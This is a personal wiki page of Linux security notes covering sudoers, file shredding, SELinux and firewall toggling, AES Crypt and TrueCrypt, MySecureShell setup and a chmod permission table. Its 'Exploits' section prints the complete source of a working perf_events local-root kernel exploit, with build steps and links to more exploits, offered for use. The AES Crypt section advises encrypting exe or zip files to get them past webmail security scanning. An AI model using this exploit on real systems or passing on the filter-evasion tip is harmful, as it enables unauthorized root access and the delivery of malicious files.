User Tools

Site Tools


Site Tools

Linux Security


General

Add user to sudoers

yum install sudo

For full access, add in /etc/sudoers

myuser ALL=(ALL:ALL) NOPASSWD: ALL

Deleting files

Create a file called “supershred” :

#!/bin/bash
set -e
find "$@" -depth -type f -exec shred -v -n 1 -z -u {} \;
rm -rvf "$@";

The make it executable and use it to delete files (google to be aware of limitations on filesystems like ext4):

$ chmod +x supershred
$ ./supershred /home/sphen/toto
shred: /home/sphen/toto: pass 1/2 (random)...
shred: /home/sphen/toto: pass 2/2 (000000)...
shred: /home/sphen/toto: removing
shred: /home/sphen/toto: renamed to /home/sphen/0000
shred: /home/sphen/0000: renamed to /home/sphen/000
shred: /home/sphen/000: renamed to /home/sphen/00
shred: /home/sphen/00: renamed to /home/sphen/0
shred: /home/sphen/toto: removed

Activating/Deactivating SELINUX on RHEL/SEL

Test if activated :

selinuxenabled && echo enabled || echo disabled

or

sestatus

or

getenforce

Turning to permissive (not permanent) :

setenforce 0

and to reactivate it :

setenforce 1

Turning permissive (permanent) or off : Edit /etc/selinux/config, and change SELINUX to (use disable not permissive to disable it):

SELINUX=permissive

Reboot and check.

Firewall

ufw

OS :

sudo ufw status
sudo ufw allow 22/tcp
sudo ufw enable
sudo ufw delete allow 25/tcp

Iptable

OS :

On calculation nodes, there is no need to activate ipatbles :

/etc/init.d/iptables save
/etc/init.d/iptables stop
chkconfig  iptables off


Crypt

Aescrypt

Encrypt data/files using OpenSource AES software.

http://www.aescrypt.com/linux_aes_crypt.html

On Microsoft Windows, prefer the command line version, which is more… discreet.

aescrypt -e myfile.dat
aescrypt -e myfile.dat.aes

Rename the file to make it less vulnerable :

aescrypt -e myfile.dat
mv myfile.dat.aes myfile; rm myfile.dat.aes

Note that it is also a good way to share zip or exe files with friends, because the webmail security will not recognise it as security thread.

If you are paranoiac, don't forget to remove these commands from your bash/csh history and use shred to remove data.

TrueCrypt

Version to be used : 7.1a.

SHA256
=======
3f48210cca1c17f433572845586d5e2a1a717a545480d136cb970689a44e3c32  truecrypt-7.1a-linux-console-x64.tar.gz
7871a40aaca4556d2c6f3377d62347bc38302f4f1ef191e7d07123bdf4a4d008  truecrypt-7.1a-linux-console-x86.tar.gz
43f895cfcdbe230907c47b4cd465e5c967bbe741a9b68512c09f809d1a2da1e9  truecrypt-7.1a-linux-x64.tar.gz
9d292baf87df34598738faef7305cddaa15ea9f174c9923185653fb28f8cfef0  truecrypt-7.1a-linux-x86.tar.gz
e6214e911d0bbededba274a2f8f8d7b3f6f6951e20f1c3a598fc7a23af81c8dc  TrueCrypt 7.1a Source.tar.gz
e95eca399dfe95500c4de569efc4cc77b75e2b66a864d467df37733ec06a0ff2  TrueCrypt Setup 7.1a.exe

(from https://defuse.ca/downloads/truecrypt-hashes.asc)

Files:

Basic usage :

Create a volume : truecrypt -t -c
Mount it : truecrypt -t /home/user/EncryptedFile.tc /home/user/EncryptedFileFolder
Unmount it : truecrypt -t -d

More : https://wiki.archlinux.org/index.php/TrueCrypt

Exploits

Enlightenment

Contains :

  • Abacus: (Linux 2.6.37→3.8.8) PERF_EVENTS local root
  • Ingo m0wnar: Linux 2.6.31 perf_counter local root
  • Sieve: Linux 2.6.18+ move_pages() infoloeak

https://github.com/packetforger/localroot/tree/master/third-party/enlightenment

2.6.37 - 3.8.10 (fucksheep.org)

http://www.tux-planet.fr/local-root-exploit-pour-les-noyaux-linux-2-6-37-a-3-8-10/

gcc -O2 semtex.c
semtex.c
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */
 
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>
 
#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
 
void fuck() {
	int i,j,k;
	uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
	uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
	uint64_t kbase = ((uint64_t)current)>>36;
	uint32_t *fixptr = (void*) AB(1);
	*fixptr = -1;
 
	for (i=0; i<4000; i+=4) {
		uint64_t *p = (void *)&current[i];
		uint32_t *t = (void*) p[0];
		if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
		for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
			if (((uint32_t*)uids)[k] != t[j+k]) goto next;
			for (i = 0; i < 8; i++) t[j+i] = 0;
			for (i = 0; i < 10; i++) t[j+9+i] = -1;
			return;
next:;		}
	}
}
 
void sheep(uint32_t off) {
	uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
	int fd = syscall(298, buf, 0, -1, -1, 0);
	assert(!close(fd));
}
 
 
int	main() {
	uint64_t  u,g,needle, kbase, *p; uint8_t *code;
	uint32_t *map, j = 5;
	int i;
	struct {
		uint16_t limit;
		uint64_t addr;
	} __attribute__((packed)) idt;
	assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
	memset(map, 0, SIZE);
	sheep(-1); sheep(-2);
	for (i = 0; i < SIZE/4; i++) if (map[i]) {
		assert(map[i+1]);
		break;
	}
	assert(i<SIZE/4);
	asm ("sidt %0" : "=m" (idt));
	kbase = idt.addr & 0xff000000;
	u = getuid(); g = getgid();
	assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
	memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
	memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
		printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
	setresuid(u,u,u); setresgid(g,g,g);
	while (j--) {
		needle = AB(j+1);
		assert(p = memmem(code, 1024, &needle, 8));
		if (!p) continue;
		*p = j?((g<<32)|u):(idt.addr + 0x48);
	}
	sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
	asm("int $0x4");	assert(!setuid(0));
	return execl("/bin/bash", "-sh", NULL);
}

Projects

Secure SFTP - My Secure Shell

Concerned OS :

My secure shell is a simple way to secure an ssh server used by some users as an sftp server. It bring a specific shell to prevent sftp users doing something else and chroot at $HOME. It also comes with many configurations settings to tune sftp use (upload/download bandwith, links following, etc).

To install it :

# you should check for newer versions
wget http://mysecureshell.free.fr/repository/index.php/source/mysecureshell_1.32.tar.gz
tar xvzf mysecureshell_1.32.tar.gz
cd mysecureshell_1.32/
./configure --with-logcolor=yes
make
make install

Then, all you need is edit the configuration file located at /etc/ssh/sftp_config. The main value to change first is max upload and max download.

        GlobalDownload          5m      #total speed download for all clients
                                        # o -> bytes   k -> kilo bytes   m -> mega bytes
        GlobalUpload            0       #total speed download for all clients (0 for unlimited)
        Download                5m      #limit speed download for each connection

The rest is up to you and well documented. You should increase the number of authorized simultaneous connections if you plan to use filezilla as a client.

It is now time to add users to this specific shell :

adduser --home /home/dudule --shell /usr/bin/MySecureShell dudule

Files Permissions

Here is a table with all permissions possibilities :

chmod 0 ———-
chmod 1 ———x
chmod 2 ——–w-
chmod 3 ——–wx
chmod 4 ——-r–
chmod 5 ——-r-x
chmod 6 ——-rw-
chmod 7 ——-rwx
chmod 10 ——x—
chmod 11 ——x–x
chmod 12 ——x-w-
chmod 13 ——x-wx
chmod 14 ——xr–
chmod 15 ——xr-x
chmod 16 ——xrw-
chmod 17 ——xrwx
chmod 20 —–w—-
chmod 21 —–w—x
chmod 22 —–w–w-
chmod 23 —–w–wx
chmod 24 —–w-r–
chmod 25 —–w-r-x
chmod 26 —–w-rw-
chmod 27 —–w-rwx
chmod 30 —–wx—
chmod 31 —–wx–x
chmod 32 —–wx-w-
chmod 33 —–wx-wx
chmod 34 —–wxr–
chmod 35 —–wxr-x
chmod 36 —–wxrw-
chmod 37 —–wxrwx
chmod 40 —-r—–
chmod 41 —-r—-x
chmod 42 —-r—w-
chmod 43 —-r—wx
chmod 44 —-r–r–
chmod 45 —-r–r-x
chmod 46 —-r–rw-
chmod 47 —-r–rwx
chmod 50 —-r-x—
chmod 51 —-r-x–x
chmod 52 —-r-x-w-
chmod 53 —-r-x-wx
chmod 54 —-r-xr–
chmod 55 —-r-xr-x
chmod 56 —-r-xrw-
chmod 57 —-r-xrwx
chmod 60 —-rw—-
chmod 61 —-rw—x
chmod 62 —-rw–w-
chmod 63 —-rw–wx
chmod 64 —-rw-r–
chmod 65 —-rw-r-x
chmod 66 —-rw-rw-
chmod 67 —-rw-rwx
chmod 70 —-rwx—
chmod 71 —-rwx–x
chmod 72 —-rwx-w-
chmod 73 —-rwx-wx
chmod 74 —-rwxr–
chmod 75 —-rwxr-x
chmod 76 —-rwxrw-
chmod 77 —-rwxrwx
chmod 100 —x——
chmod 101 —x—–x
chmod 102 —x—-w-
chmod 103 —x—-wx
chmod 104 —x—r–
chmod 105 —x—r-x
chmod 106 —x—rw-
chmod 107 —x—rwx
chmod 110 —x–x—
chmod 111 —x–x–x
chmod 112 —x–x-w-
chmod 113 —x–x-wx
chmod 114 —x–xr–
chmod 115 —x–xr-x
chmod 116 —x–xrw-
chmod 117 —x–xrwx
chmod 120 —x-w—-
chmod 121 —x-w—x
chmod 122 —x-w–w-
chmod 123 —x-w–wx
chmod 124 —x-w-r–
chmod 125 —x-w-r-x
chmod 126 —x-w-rw-
chmod 127 —x-w-rwx
chmod 130 —x-wx—
chmod 131 —x-wx–x
chmod 132 —x-wx-w-
chmod 133 —x-wx-wx
chmod 134 —x-wxr–
chmod 135 —x-wxr-x
chmod 136 —x-wxrw-
chmod 137 —x-wxrwx
chmod 140 —xr—–
chmod 141 —xr—-x
chmod 142 —xr—w-
chmod 143 —xr—wx
chmod 144 —xr–r–
chmod 145 —xr–r-x
chmod 146 —xr–rw-
chmod 147 —xr–rwx
chmod 150 —xr-x—
chmod 151 —xr-x–x
chmod 152 —xr-x-w-
chmod 153 —xr-x-wx
chmod 154 —xr-xr–
chmod 155 —xr-xr-x
chmod 156 —xr-xrw-
chmod 157 —xr-xrwx
chmod 160 —xrw—-
chmod 161 —xrw—x
chmod 162 —xrw–w-
chmod 163 —xrw–wx
chmod 164 —xrw-r–
chmod 165 —xrw-r-x
chmod 166 —xrw-rw-
chmod 167 —xrw-rwx
chmod 170 —xrwx—
chmod 171 —xrwx–x
chmod 172 —xrwx-w-
chmod 173 —xrwx-wx
chmod 174 —xrwxr–
chmod 175 —xrwxr-x
chmod 176 —xrwxrw-
chmod 177 —xrwxrwx
chmod 200 –w——-
chmod 201 –w——x
chmod 202 –w—–w-
chmod 203 –w—–wx
chmod 204 –w—-r–
chmod 205 –w—-r-x
chmod 206 –w—-rw-
chmod 207 –w—-rwx
chmod 210 –w—x—
chmod 211 –w—x–x
chmod 212 –w—x-w-
chmod 213 –w—x-wx
chmod 214 –w—xr–
chmod 215 –w—xr-x
chmod 216 –w—xrw-
chmod 217 –w—xrwx
chmod 220 –w–w—-
chmod 221 –w–w—x
chmod 222 –w–w–w-
chmod 223 –w–w–wx
chmod 224 –w–w-r–
chmod 225 –w–w-r-x
chmod 226 –w–w-rw-
chmod 227 –w–w-rwx
chmod 230 –w–wx—
chmod 231 –w–wx–x
chmod 232 –w–wx-w-
chmod 233 –w–wx-wx
chmod 234 –w–wxr–
chmod 235 –w–wxr-x
chmod 236 –w–wxrw-
chmod 237 –w–wxrwx
chmod 240 –w-r—–
chmod 241 –w-r—-x
chmod 242 –w-r—w-
chmod 243 –w-r—wx
chmod 244 –w-r–r–
chmod 245 –w-r–r-x
chmod 246 –w-r–rw-
chmod 247 –w-r–rwx
chmod 250 –w-r-x—
chmod 251 –w-r-x–x
chmod 252 –w-r-x-w-
chmod 253 –w-r-x-wx
chmod 254 –w-r-xr–
chmod 255 –w-r-xr-x
chmod 256 –w-r-xrw-
chmod 257 –w-r-xrwx\\

chmod 260 –w-rw—-
chmod 261 –w-rw—x
chmod 262 –w-rw–w-
chmod 263 –w-rw–wx
chmod 264 –w-rw-r–
chmod 265 –w-rw-r-x
chmod 266 –w-rw-rw-
chmod 267 –w-rw-rwx
chmod 270 –w-rwx—
chmod 271 –w-rwx–x
chmod 272 –w-rwx-w-
chmod 273 –w-rwx-wx
chmod 274 –w-rwxr–
chmod 275 –w-rwxr-x
chmod 276 –w-rwxrw-
chmod 277 –w-rwxrwx
chmod 300 –wx——
chmod 301 –wx—–x
chmod 302 –wx—-w-
chmod 303 –wx—-wx
chmod 304 –wx—r–
chmod 305 –wx—r-x
chmod 306 –wx—rw-
chmod 307 –wx—rwx
chmod 310 –wx–x—
chmod 311 –wx–x–x
chmod 312 –wx–x-w-
chmod 313 –wx–x-wx
chmod 314 –wx–xr–
chmod 315 –wx–xr-x
chmod 316 –wx–xrw-
chmod 317 –wx–xrwx
chmod 320 –wx-w—-
chmod 321 –wx-w—x
chmod 322 –wx-w–w-
chmod 323 –wx-w–wx
chmod 324 –wx-w-r–
chmod 325 –wx-w-r-x
chmod 326 –wx-w-rw-
chmod 327 –wx-w-rwx
chmod 330 –wx-wx—
chmod 331 –wx-wx–x
chmod 332 –wx-wx-w-
chmod 333 –wx-wx-wx
chmod 334 –wx-wxr–
chmod 335 –wx-wxr-x
chmod 336 –wx-wxrw-
chmod 337 –wx-wxrwx
chmod 340 –wxr—–
chmod 341 –wxr—-x
chmod 342 –wxr—w-
chmod 343 –wxr—wx
chmod 344 –wxr–r–
chmod 345 –wxr–r-x
chmod 346 –wxr–rw-
chmod 347 –wxr–rwx
chmod 350 –wxr-x—
chmod 351 –wxr-x–x
chmod 352 –wxr-x-w-
chmod 353 –wxr-x-wx
chmod 354 –wxr-xr–
chmod 355 –wxr-xr-x
chmod 356 –wxr-xrw-
chmod 357 –wxr-xrwx
chmod 360 –wxrw—-
chmod 361 –wxrw—x
chmod 362 –wxrw–w-
chmod 363 –wxrw–wx
chmod 364 –wxrw-r–
chmod 365 –wxrw-r-x
chmod 366 –wxrw-rw-
chmod 367 –wxrw-rwx
chmod 370 –wxrwx—
chmod 371 –wxrwx–x
chmod 372 –wxrwx-w-
chmod 373 –wxrwx-wx
chmod 374 –wxrwxr–
chmod 375 –wxrwxr-x
chmod 376 –wxrwxrw-
chmod 377 –wxrwxrwx
chmod 400 -r——–
chmod 401 -r——-x
chmod 402 -r——w-
chmod 403 -r——wx
chmod 404 -r—–r–
chmod 405 -r—–r-x
chmod 406 -r—–rw-
chmod 407 -r—–rwx
chmod 410 -r—-x—
chmod 411 -r—-x–x
chmod 412 -r—-x-w-
chmod 413 -r—-x-wx
chmod 414 -r—-xr–
chmod 415 -r—-xr-x
chmod 416 -r—-xrw-
chmod 417 -r—-xrwx
chmod 420 -r—w—-
chmod 421 -r—w—x
chmod 422 -r—w–w-
chmod 423 -r—w–wx
chmod 424 -r—w-r–
chmod 425 -r—w-r-x
chmod 426 -r—w-rw-
chmod 427 -r—w-rwx
chmod 430 -r—wx—
chmod 431 -r—wx–x
chmod 432 -r—wx-w-
chmod 433 -r—wx-wx
chmod 434 -r—wxr–
chmod 435 -r—wxr-x
chmod 436 -r—wxrw-
chmod 437 -r—wxrwx
chmod 440 -r–r—–
chmod 441 -r–r—-x
chmod 442 -r–r—w-
chmod 443 -r–r—wx
chmod 444 -r–r–r–
chmod 445 -r–r–r-x
chmod 446 -r–r–rw-
chmod 447 -r–r–rwx
chmod 450 -r–r-x—
chmod 451 -r–r-x–x
chmod 452 -r–r-x-w-
chmod 453 -r–r-x-wx
chmod 454 -r–r-xr–
chmod 455 -r–r-xr-x
chmod 456 -r–r-xrw-
chmod 457 -r–r-xrwx
chmod 460 -r–rw—-
chmod 461 -r–rw—x
chmod 462 -r–rw–w-
chmod 463 -r–rw–wx
chmod 464 -r–rw-r–
chmod 465 -r–rw-r-x
chmod 466 -r–rw-rw-
chmod 467 -r–rw-rwx
chmod 470 -r–rwx—
chmod 471 -r–rwx–x
chmod 472 -r–rwx-w-
chmod 473 -r–rwx-wx
chmod 474 -r–rwxr–
chmod 475 -r–rwxr-x
chmod 476 -r–rwxrw-
chmod 477 -r–rwxrwx
chmod 500 -r-x——
chmod 501 -r-x—–x
chmod 502 -r-x—-w-
chmod 503 -r-x—-wx
chmod 504 -r-x—r–
chmod 505 -r-x—r-x
chmod 506 -r-x—rw-
chmod 507 -r-x—rwx
chmod 510 -r-x–x—
chmod 511 -r-x–x–x
chmod 512 -r-x–x-w-
chmod 513 -r-x–x-wx
chmod 514 -r-x–xr–
chmod 515 -r-x–xr-x
chmod 516 -r-x–xrw-
chmod 517 -r-x–xrwx
chmod 520 -r-x-w—-
chmod 521 -r-x-w—x
chmod 522 -r-x-w–w-
chmod 523 -r-x-w–wx
chmod 524 -r-x-w-r–
chmod 525 -r-x-w-r-x
chmod 526 -r-x-w-rw-
chmod 527 -r-x-w-rwx
chmod 530 -r-x-wx—
chmod 531 -r-x-wx–x
chmod 532 -r-x-wx-w-
chmod 533 -r-x-wx-wx
chmod 534 -r-x-wxr–
chmod 535 -r-x-wxr-x
chmod 536 -r-x-wxrw-
chmod 537 -r-x-wxrwx\\

chmod 540 -r-xr—–
chmod 541 -r-xr—-x
chmod 542 -r-xr—w-
chmod 543 -r-xr—wx
chmod 544 -r-xr–r–
chmod 545 -r-xr–r-x
chmod 546 -r-xr–rw-
chmod 547 -r-xr–rwx
chmod 550 -r-xr-x—
chmod 551 -r-xr-x–x
chmod 552 -r-xr-x-w-
chmod 553 -r-xr-x-wx
chmod 554 -r-xr-xr–
chmod 555 -r-xr-xr-x
chmod 556 -r-xr-xrw-
chmod 557 -r-xr-xrwx
chmod 560 -r-xrw—-
chmod 561 -r-xrw—x
chmod 562 -r-xrw–w-
chmod 563 -r-xrw–wx
chmod 564 -r-xrw-r–
chmod 565 -r-xrw-r-x
chmod 566 -r-xrw-rw-
chmod 567 -r-xrw-rwx
chmod 570 -r-xrwx—
chmod 571 -r-xrwx–x
chmod 572 -r-xrwx-w-
chmod 573 -r-xrwx-wx
chmod 574 -r-xrwxr–
chmod 575 -r-xrwxr-x
chmod 576 -r-xrwxrw-
chmod 577 -r-xrwxrwx
chmod 600 -rw——-
chmod 601 -rw——x
chmod 602 -rw—–w-
chmod 603 -rw—–wx
chmod 604 -rw—-r–
chmod 605 -rw—-r-x
chmod 606 -rw—-rw-
chmod 607 -rw—-rwx
chmod 610 -rw—x—
chmod 611 -rw—x–x
chmod 612 -rw—x-w-
chmod 613 -rw—x-wx
chmod 614 -rw—xr–
chmod 615 -rw—xr-x
chmod 616 -rw—xrw-
chmod 617 -rw—xrwx
chmod 620 -rw–w—-
chmod 621 -rw–w—x
chmod 622 -rw–w–w-
chmod 623 -rw–w–wx
chmod 624 -rw–w-r–
chmod 625 -rw–w-r-x
chmod 626 -rw–w-rw-
chmod 627 -rw–w-rwx
chmod 630 -rw–wx—
chmod 631 -rw–wx–x
chmod 632 -rw–wx-w-
chmod 633 -rw–wx-wx
chmod 634 -rw–wxr–
chmod 635 -rw–wxr-x
chmod 636 -rw–wxrw-
chmod 637 -rw–wxrwx
chmod 640 -rw-r—–
chmod 641 -rw-r—-x
chmod 642 -rw-r—w-
chmod 643 -rw-r—wx
chmod 644 -rw-r–r–
chmod 645 -rw-r–r-x
chmod 646 -rw-r–rw-
chmod 647 -rw-r–rwx
chmod 650 -rw-r-x—
chmod 651 -rw-r-x–x
chmod 652 -rw-r-x-w-
chmod 653 -rw-r-x-wx
chmod 654 -rw-r-xr–
chmod 655 -rw-r-xr-x
chmod 656 -rw-r-xrw-
chmod 657 -rw-r-xrwx
chmod 660 -rw-rw—-
chmod 661 -rw-rw—x
chmod 662 -rw-rw–w-
chmod 663 -rw-rw–wx
chmod 664 -rw-rw-r–
chmod 665 -rw-rw-r-x
chmod 666 -rw-rw-rw-
chmod 667 -rw-rw-rwx
chmod 670 -rw-rwx—
chmod 671 -rw-rwx–x
chmod 672 -rw-rwx-w-
chmod 673 -rw-rwx-wx
chmod 674 -rw-rwxr–
chmod 675 -rw-rwxr-x
chmod 676 -rw-rwxrw-
chmod 677 -rw-rwxrwx
chmod 700 -rwx——
chmod 701 -rwx—–x
chmod 702 -rwx—-w-
chmod 703 -rwx—-wx
chmod 704 -rwx—r–
chmod 705 -rwx—r-x
chmod 706 -rwx—rw-
chmod 707 -rwx—rwx
chmod 710 -rwx–x—
chmod 711 -rwx–x–x
chmod 712 -rwx–x-w-
chmod 713 -rwx–x-wx
chmod 714 -rwx–xr–
chmod 715 -rwx–xr-x
chmod 716 -rwx–xrw-
chmod 717 -rwx–xrwx
chmod 720 -rwx-w—-
chmod 721 -rwx-w—x
chmod 722 -rwx-w–w-
chmod 723 -rwx-w–wx
chmod 724 -rwx-w-r–
chmod 725 -rwx-w-r-x
chmod 726 -rwx-w-rw-
chmod 727 -rwx-w-rwx
chmod 730 -rwx-wx—
chmod 731 -rwx-wx–x
chmod 732 -rwx-wx-w-
chmod 733 -rwx-wx-wx
chmod 734 -rwx-wxr–
chmod 735 -rwx-wxr-x
chmod 736 -rwx-wxrw-
chmod 737 -rwx-wxrwx
chmod 740 -rwxr—–
chmod 741 -rwxr—-x
chmod 742 -rwxr—w-
chmod 743 -rwxr—wx
chmod 744 -rwxr–r–
chmod 745 -rwxr–r-x
chmod 746 -rwxr–rw-
chmod 747 -rwxr–rwx
chmod 750 -rwxr-x—
chmod 751 -rwxr-x–x
chmod 752 -rwxr-x-w-
chmod 753 -rwxr-x-wx
chmod 754 -rwxr-xr–
chmod 755 -rwxr-xr-x
chmod 756 -rwxr-xrw-
chmod 757 -rwxr-xrwx
chmod 760 -rwxrw—-
chmod 761 -rwxrw—x
chmod 762 -rwxrw–w-
chmod 763 -rwxrw–wx
chmod 764 -rwxrw-r–
chmod 765 -rwxrw-r-x
chmod 766 -rwxrw-rw-
chmod 767 -rwxrw-rwx
chmod 770 -rwxrwx—
chmod 771 -rwxrwx–x
chmod 772 -rwxrwx-w-
chmod 773 -rwxrwx-wx
chmod 774 -rwxrwxr–
chmod 775 -rwxrwxr-x
chmod 776 -rwxrwxrw-
chmod 777 -rwxrwxrwx\\